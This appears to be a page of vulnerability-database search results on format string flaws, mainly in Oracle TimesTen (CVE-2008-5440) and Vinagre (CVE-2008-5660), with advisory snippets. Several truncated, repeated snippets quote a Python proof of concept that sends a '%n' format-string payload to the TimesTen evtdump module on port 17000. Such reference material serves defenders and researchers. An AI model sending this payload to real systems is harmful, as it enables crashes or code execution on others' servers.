8515 matches found
Oracle TimesTen Remote Format String PoC
No description provided by source. !/usr/bin/python """ Oracle TimesTen Remote Format String Fixed in Oracle CPU Jan 2009 Copyright c Joxean Koret 2009 """ import sys import socket def testPochost: s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connecthost, 17000 buf = "GET...
Oracle Times Ten Format String
!/usr/bin/python """ Oracle TimesTen Remote Format String Fixed in Oracle CPU Jan 2009 Copyright c Joxean Koret 2009 """ import sys import socket def testPochost: s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connecthost, 17000 buf = "GET evtdump?msg=AAAA%25n HTTP/1.0\r\n\r\n" print "Sendin...
CVE-2008-5440
Unspecified vulnerability in the TimesTen Data Server component in Oracle Database 7.0.5.0.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the January 2009 CPU. Oracle has not commented on...
Format string
Unspecified vulnerability in the TimesTen Data Server component in Oracle Database 7.0.5.0.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the January 2009 CPU. Oracle has not commented on...
CVE-2008-5440
Unspecified vulnerability in the TimesTen Data Server component in Oracle Database 7.0.5.0.0 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the January 2009 CPU. Oracle has not commented on...
CVE-2008-5440
Summary: CVE-2008-5440 concerns Oracle TimesTen In-Memory Database, specifically the TimesTen Data Server component. Connected sources clearly describe a format string vulnerability in the evtdump CGI module, triggered by the HTTP/message handling (parameter ‘msg’), which can be exploited remotel...
Oracle TimesTen Remote Format String PoC
Exploit for multiple platform in category dos / poc ======================================== Oracle TimesTen Remote Format String PoC ======================================== !/usr/bin/python """ Oracle TimesTen Remote Format String Fixed in Oracle CPU Jan 2009 Copyright c Joxean Koret 2009 """...
Oracle TimesTen - Remote Format String (PoC)
Oracle TimesTen - Remote Format String PoC !/usr/bin/python """ Oracle TimesTen Remote Format String Fixed in Oracle CPU Jan 2009 Copyright c Joxean Koret 2009 """ import sys import socket def testPochost: s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connecthost, 17000 buf = "GET...
Oracle TimesTen evtdump Remote Format String Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle TimesTen. User interaction is not required to exploit this vulnerability. The specific flaw exists in the evtdump CGI module, which is used to write to an internal log file. The parameter...
Oracle TimesTen - Remote Format String (PoC)
!/usr/bin/python """ Oracle TimesTen Remote Format String Fixed in Oracle CPU Jan 2009 Copyright c Joxean Koret 2009 """ import sys import socket def testPochost: s = socket.socketsocket.AFINET, socket.SOCKSTREAM s.connecthost, 17000 buf = "GET evtdump?msg=AAAA%25n HTTP/1.0\r\n\r\n" print "Sendin...
FreeBSD : vinagre -- format string vulnerability (214e8e07-d369-11dd-b800-001b77d09812)
CORE Security Technologies reports : A format string error has been found on the vinagreutilsshowerror function that can be exploited via commands issued from a malicious server containing format string specifiers on the VNC name. In a web-based attack scenario, the user would be required to...
DEBIAN-CVE-2008-5660
Format string vulnerability in the vinagreutilsshowerror function src/vinagre-utils.c in Vinagre 0.5.x before 0.5.2 and 2.x before 2.24.2 might allow remote attackers to execute arbitrary code via format string specifiers in a crafted URI or VNC server response...
CVE-2008-5660
Format string vulnerability in the vinagreutilsshowerror function src/vinagre-utils.c in Vinagre 0.5.x before 0.5.2 and 2.x before 2.24.2 might allow remote attackers to execute arbitrary code via format string specifiers in a crafted URI or VNC server response...
CVE-2008-5660
Format string vulnerability in the vinagreutilsshowerror function src/vinagre-utils.c in Vinagre 0.5.x before 0.5.2 and 2.x before 2.24.2 might allow remote attackers to execute arbitrary code via format string specifiers in a crafted URI or VNC server response...
CVE-2008-5660
Format string vulnerability in the vinagreutilsshowerror function src/vinagre-utils.c in Vinagre 0.5.x before 0.5.2 and 2.x before 2.24.2 might allow remote attackers to execute arbitrary code via format string specifiers in a crafted URI or VNC server response...
CVE-2008-5660
Vinagre contains a format string vulnerability in vinagre_utils_show_error() (src/vinagre-utils.c) that affects Vinagre 0.5.x before 0.5.2 and 2.x before 2.24.2. A remote attacker could induce arbitrary code execution by supplying a crafted URI or VNC server response. Several advisories confirm r...
CVE-2008-5660
Format string vulnerability in the vinagreutilsshowerror function src/vinagre-utils.c in Vinagre 0.5.x before 0.5.2 and 2.x before 2.24.2 might allow remote attackers to execute arbitrary code via format string specifiers in a crafted URI or VNC server response...
CVE-2008-5660
Format string vulnerability in the vinagreutilsshowerror function src/vinagre-utils.c in Vinagre 0.5.x before 0.5.2 and 2.x before 2.24.2 might allow remote attackers to execute arbitrary code via format string specifiers in a crafted URI or VNC server response...
BMC Patrol Agent format string vulnerability
Format string vulneerability in logging via version number...
CORE-2008-1127 - Vinagre show_error() format string vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Vinagre showerror format string vulnerability 1. Advisory Information Title: Vinagre showerror format string vulnerability Advisory ID: CORE-2008-1127 Advisory URL:...